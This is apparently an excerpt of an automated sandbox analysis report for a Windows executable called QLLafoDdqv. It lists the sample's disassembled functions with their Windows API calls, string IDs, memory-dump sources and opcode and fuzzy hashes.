              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B165
              • GetWindowThreadProcessId.USER32(00000000), ref: 0073B16C
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B17B
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0073B18D
              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B1A6
              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B1B8
              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B1FD
              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B212
              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0073A1E1,?,00000001), ref: 0073B21D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
              • String ID:
              • API String ID: 2156557900-0
              • Opcode ID: 8bc8d425edd1d41f61a2257762b6e352dcb323e8b8c58ef0a1e890fa13140902
              • Instruction ID: 7220ce584162416e83be6269efb496293819f43cae6a7950a89e792d5cb05483
              • Opcode Fuzzy Hash: 8bc8d425edd1d41f61a2257762b6e352dcb323e8b8c58ef0a1e890fa13140902
              • Instruction Fuzzy Hash: FE317C75500308BFEB119F64DC49B7FBBAABB92311F10C115FA06DA192D7BC9A408F68
              Function 00702C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00702C94
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 00702CA0
              • _free.LIBCMT ref: 00702CAB
              • _free.LIBCMT ref: 00702CB6
              • _free.LIBCMT ref: 00702CC1
              • _free.LIBCMT ref: 00702CCC
              • _free.LIBCMT ref: 00702CD7
              • _free.LIBCMT ref: 00702CE2
              • _free.LIBCMT ref: 00702CED
              • _free.LIBCMT ref: 00702CFB
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 6935c87624f14a5b7efff48327b01aa265184bce4f8e246b693c8540741c1431
              • Instruction ID: 43a0959efaac3c4b7e5f12627f2c72cc55203aa6845d242f33339e1b85032b3b
              • Opcode Fuzzy Hash: 6935c87624f14a5b7efff48327b01aa265184bce4f8e246b693c8540741c1431
              • Instruction Fuzzy Hash: 00119676110108EFCB02EF54D84ACDD3BA9FF05350F6146A5F9486B272D635FA519F90
              Function 006D1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
              Download Yara Rule
              APIs
              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 006D1459
              • OleUninitialize.OLE32(?,00000000), ref: 006D14F8
              • UnregisterHotKey.USER32(?), ref: 006D16DD
              • DestroyWindow.USER32(?), ref: 007124B9
              • FreeLibrary.KERNEL32(?), ref: 0071251E
              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0071254B
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
              • String ID: close all
              • API String ID: 469580280-3243417748
              • Opcode ID: f8023f493b59dfed156aba84ac7d78b95ed47f13adcee9215d66654ff7f8af9c
              • Instruction ID: c17395baa87b00ac904a9ad7e1a1b948bdfc85369b5e74a749bd6d1861ab054b
              • Opcode Fuzzy Hash: f8023f493b59dfed156aba84ac7d78b95ed47f13adcee9215d66654ff7f8af9c
              • Instruction Fuzzy Hash: 4FD16D31B01212DFCB19EF19C495A69F7A2BF05700F1441AEE84A6B3A2DB74AD63CF54
              Function 006D5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
              Download Yara Rule
              APIs
              • SetWindowLongW.USER32(?,000000EB), ref: 006D5C7A
                • Part of subcall function 006D5D0A: GetClientRect.USER32(?,?), ref: 006D5D30
                • Part of subcall function 006D5D0A: GetWindowRect.USER32(?,?), ref: 006D5D71
                • Part of subcall function 006D5D0A: ScreenToClient.USER32(?,?), ref: 006D5D99
              • GetDC.USER32 ref: 007146F5
              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00714708
              • SelectObject.GDI32(00000000,00000000), ref: 00714716
              • SelectObject.GDI32(00000000,00000000), ref: 0071472B
              • ReleaseDC.USER32(?,00000000), ref: 00714733
              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007147C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
              • String ID: U
              • API String ID: 4009187628-3372436214
              • Opcode ID: bd4fbbfd26edb954e1b415a4186b5d3f5323206b42ef5421f56b6b6277849dca
              • Instruction ID: c93a29ae5c24e2397aebaa55694c1800c22f43e1d9e75eaa266f2639d9a167bf
              • Opcode Fuzzy Hash: bd4fbbfd26edb954e1b415a4186b5d3f5323206b42ef5421f56b6b6277849dca
              • Instruction Fuzzy Hash: A371E131900205DFCF218F68C984AFA3BB6FF4A365F14426AED565A2E6C7399C81DF50
              Function 0074359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
              Download Yara Rule
              APIs
              • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007435E4
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • LoadStringW.USER32(007A2390,?,00000FFF,?), ref: 0074360A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LoadString$_wcslen
              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
              • API String ID: 4099089115-2391861430
              • Opcode ID: ff30329075effff287e0f063cac1a140231ec31b7f70b66b10eaf0dfd9c83950
              • Instruction ID: c37b5d2820cea2601d1c3ef607c6a45cb201f7257c41707420e4e929b4182f98
              • Opcode Fuzzy Hash: ff30329075effff287e0f063cac1a140231ec31b7f70b66b10eaf0dfd9c83950
              • Instruction Fuzzy Hash: C1517171D00259BADF15EBA0DC46EEDBB39AF04300F14412AF505722A1DB751B98DFA5
              Function 0074C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
              Download Yara Rule
              APIs
              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0074C272
              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0074C29A
              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0074C2CA
              • GetLastError.KERNEL32 ref: 0074C322
              • SetEvent.KERNEL32(?), ref: 0074C336
              • InternetCloseHandle.WININET(00000000), ref: 0074C341
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
              • String ID:
              • API String ID: 3113390036-3916222277
              • Opcode ID: 0c5acad495dd7ddf09b2099c0a44ef209630204c09c445ec2434493035c1d27e
              • Instruction ID: b6dc6416ff79f7a39856ffcb307c316dc0c164a0353473d73fd3f198d18aef88
              • Opcode Fuzzy Hash: 0c5acad495dd7ddf09b2099c0a44ef209630204c09c445ec2434493035c1d27e
              • Instruction Fuzzy Hash: 49317CB1601308AFD7629FA5CC88ABB7BFCEB49744F14851EF486D2210DB78DD049B65
              Function 0073989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00713AAF,?,?,Bad directive syntax error,0076CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 007398BC
              • LoadStringW.USER32(00000000,?,00713AAF,?), ref: 007398C3
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00739987
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HandleLoadMessageModuleString_wcslen
              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
              • API String ID: 858772685-4153970271
              • Opcode ID: a9e269a17ab2d6e4b35a7943a4fb53368661db7443857effa26837f5dc1a28be
              • Instruction ID: 7928cdc2cf152a5156d6d48401b141ff6506439a16a4085b603d4843ce78d35e
              • Opcode Fuzzy Hash: a9e269a17ab2d6e4b35a7943a4fb53368661db7443857effa26837f5dc1a28be
              • Instruction Fuzzy Hash: D521B471D0025EEBDF15AF90CC06EED7736FF18300F04441AF515661A2DB79A628DB25
              Function 0073209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
              Download Yara Rule
              APIs
              • GetParent.USER32 ref: 007320AB
              • GetClassNameW.USER32(00000000,?,00000100), ref: 007320C0
              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0073214D
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClassMessageNameParentSend
              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
              • API String ID: 1290815626-3381328864
              • Opcode ID: f107ac6b18a28d8a41e2f7b7e177f5c65d3bf0f582e46efe92c045a524f06f60
              • Instruction ID: 8dfd014febe5f36b1f5b6f436b1fbff5c0959fcdb5cac0f76a40a8e2bfdff386
              • Opcode Fuzzy Hash: f107ac6b18a28d8a41e2f7b7e177f5c65d3bf0f582e46efe92c045a524f06f60
              • Instruction Fuzzy Hash: 8A11E3B668871EB9FA022224ED06DB7379CCB04324F20015AFB05A50E7FEA969035618
              Function 0070CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
              • String ID:
              • API String ID: 1282221369-0
              • Opcode ID: 98eaf1aa8db762972f091f95f26b90050fa767fb2b08d1bb0985a8c7704c0b8d
              • Instruction ID: 2fc5c6819e06a99f8a3af5397176a69a7ca00f161ca8030ff2e4312c7df0eaa8
              • Opcode Fuzzy Hash: 98eaf1aa8db762972f091f95f26b90050fa767fb2b08d1bb0985a8c7704c0b8d
              • Instruction Fuzzy Hash: 78614973A04302EFDB22AFB4D88966E7BE5AF05310F14476DF945A72C2D63DAD018791
              Function 007650D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00765186
              • ShowWindow.USER32(?,00000000), ref: 007651C7
              • ShowWindow.USER32(?,00000005,?,00000000), ref: 007651CD
              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 007651D1
                • Part of subcall function 00766FBA: DeleteObject.GDI32(00000000), ref: 00766FE6
              • GetWindowLongW.USER32(?,000000F0), ref: 0076520D
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0076521A
              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0076524D
              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00765287
              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00765296
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
              • String ID:
              • API String ID: 3210457359-0
              • Opcode ID: 623fea6e7e9f8b648037a5c459cf90159b9ed8ee681cd02ee3d60994a4558418
              • Instruction ID: 8bdb8b99762e30df70c46ed8709839f7201a762aca9e505ea10b152bf054ec04
              • Opcode Fuzzy Hash: 623fea6e7e9f8b648037a5c459cf90159b9ed8ee681cd02ee3d60994a4558418
              • Instruction Fuzzy Hash: 0A519270A41A08FEEF249F28CC59BD93B65FB06321F148111FD17962E0C3BDA990EB55
              Function 006E8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
              Download Yara Rule
              APIs
              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00726890
              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007268A9
              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007268B9
              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007268D1
              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007268F2
              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006E8874,00000000,00000000,00000000,000000FF,00000000), ref: 00726901
              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0072691E
              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,006E8874,00000000,00000000,00000000,000000FF,00000000), ref: 0072692D
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Icon$DestroyExtractImageLoadMessageSend
              • String ID:
              • API String ID: 1268354404-0
              • Opcode ID: d6b9c59ff612a45e63d3e0f52d23b6f980a4598fa293e220072b0de570e12e60
              • Instruction ID: a5536db9ac273d6ff36c92aff29d4a13d05fd7370b0bb7d3c9081560d95670b3
              • Opcode Fuzzy Hash: d6b9c59ff612a45e63d3e0f52d23b6f980a4598fa293e220072b0de570e12e60
              • Instruction Fuzzy Hash: BE51A870600349EFDB20CF25CC95BAA7BB6EF88350F108519F946972A0DBB8E991DB50
              Function 0074C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
              Download Yara Rule
              APIs
              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0074C182
              • GetLastError.KERNEL32 ref: 0074C195
              • SetEvent.KERNEL32(?), ref: 0074C1A9
                • Part of subcall function 0074C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0074C272
                • Part of subcall function 0074C253: GetLastError.KERNEL32 ref: 0074C322
                • Part of subcall function 0074C253: SetEvent.KERNEL32(?), ref: 0074C336
                • Part of subcall function 0074C253: InternetCloseHandle.WININET(00000000), ref: 0074C341
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
              • String ID:
              • API String ID: 337547030-0
              • Opcode ID: 0680e363e104d739e0b94aee18874776dc03688f1318fa73f1858981511b0b0e
              • Instruction ID: 98ef851e4a431c5ce2d4ef5473934a91c362f7f8047d6e0182cb193791330184
              • Opcode Fuzzy Hash: 0680e363e104d739e0b94aee18874776dc03688f1318fa73f1858981511b0b0e
              • Instruction Fuzzy Hash: DD31AF71202745EFDB629FB5DC04A76BBF8FF18300B04842DF99686620D7B9E8149B60
              Function 007325A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00733A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00733A57
                • Part of subcall function 00733A3D: GetCurrentThreadId.KERNEL32 ref: 00733A5E
                • Part of subcall function 00733A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007325B3), ref: 00733A65
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 007325BD
              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007325DB
              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 007325DF
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 007325E9
              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00732601
              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00732605
              • MapVirtualKeyW.USER32(00000025,00000000), ref: 0073260F
              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00732623
              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00732627
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
              • String ID:
              • API String ID: 2014098862-0
              • Opcode ID: e9c4d3b46787181fda0e4f9fc104202ad761656a1e39a24fe3e88b9f6e2d7599
              • Instruction ID: 58749824395ef0a3cd213885e9637fcb0f503eef39c5a056950e5e8f64cbda7a
              • Opcode Fuzzy Hash: e9c4d3b46787181fda0e4f9fc104202ad761656a1e39a24fe3e88b9f6e2d7599
              • Instruction Fuzzy Hash: 0901B170390314BBFB206768DC8FF693E59DB4AB12F104041F359AE0E2C9EA28458A6D
              Function 00731803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
              Download Yara Rule
              APIs
              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00731449,?,?,00000000), ref: 0073180C
              • HeapAlloc.KERNEL32(00000000,?,00731449,?,?,00000000), ref: 00731813
              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00731449,?,?,00000000), ref: 00731828
              • GetCurrentProcess.KERNEL32(?,00000000,?,00731449,?,?,00000000), ref: 00731830
              • DuplicateHandle.KERNEL32(00000000,?,00731449,?,?,00000000), ref: 00731833
              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00731449,?,?,00000000), ref: 00731843
              • GetCurrentProcess.KERNEL32(00731449,00000000,?,00731449,?,?,00000000), ref: 0073184B
              • DuplicateHandle.KERNEL32(00000000,?,00731449,?,?,00000000), ref: 0073184E
              • CreateThread.KERNEL32(00000000,00000000,00731874,00000000,00000000,00000000), ref: 00731868
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
              • String ID:
              • API String ID: 1957940570-0
              • Opcode ID: bba34851ef44c44349ff529f565cf02bcadf1eb55fc13f5368194b4992b6db62
              • Instruction ID: 7af4586682d79fdd02922e4202f9aea89e0a75d119d406d5ee64f6d68ef4e480
              • Opcode Fuzzy Hash: bba34851ef44c44349ff529f565cf02bcadf1eb55fc13f5368194b4992b6db62
              • Instruction Fuzzy Hash: DE01BFB5240348BFE711AB65DC4EF673B6CEB8AB11F418411FA45DB191C6B59C00CB34
              Function 0075A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0073D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0073D501
                • Part of subcall function 0073D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0073D50F
                • Part of subcall function 0073D4DC: CloseHandle.KERNEL32(00000000), ref: 0073D5DC
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0075A16D
              • GetLastError.KERNEL32 ref: 0075A180
              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0075A1B3
              • TerminateProcess.KERNEL32(00000000,00000000), ref: 0075A268
              • GetLastError.KERNEL32(00000000), ref: 0075A273
              • CloseHandle.KERNEL32(00000000), ref: 0075A2C4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
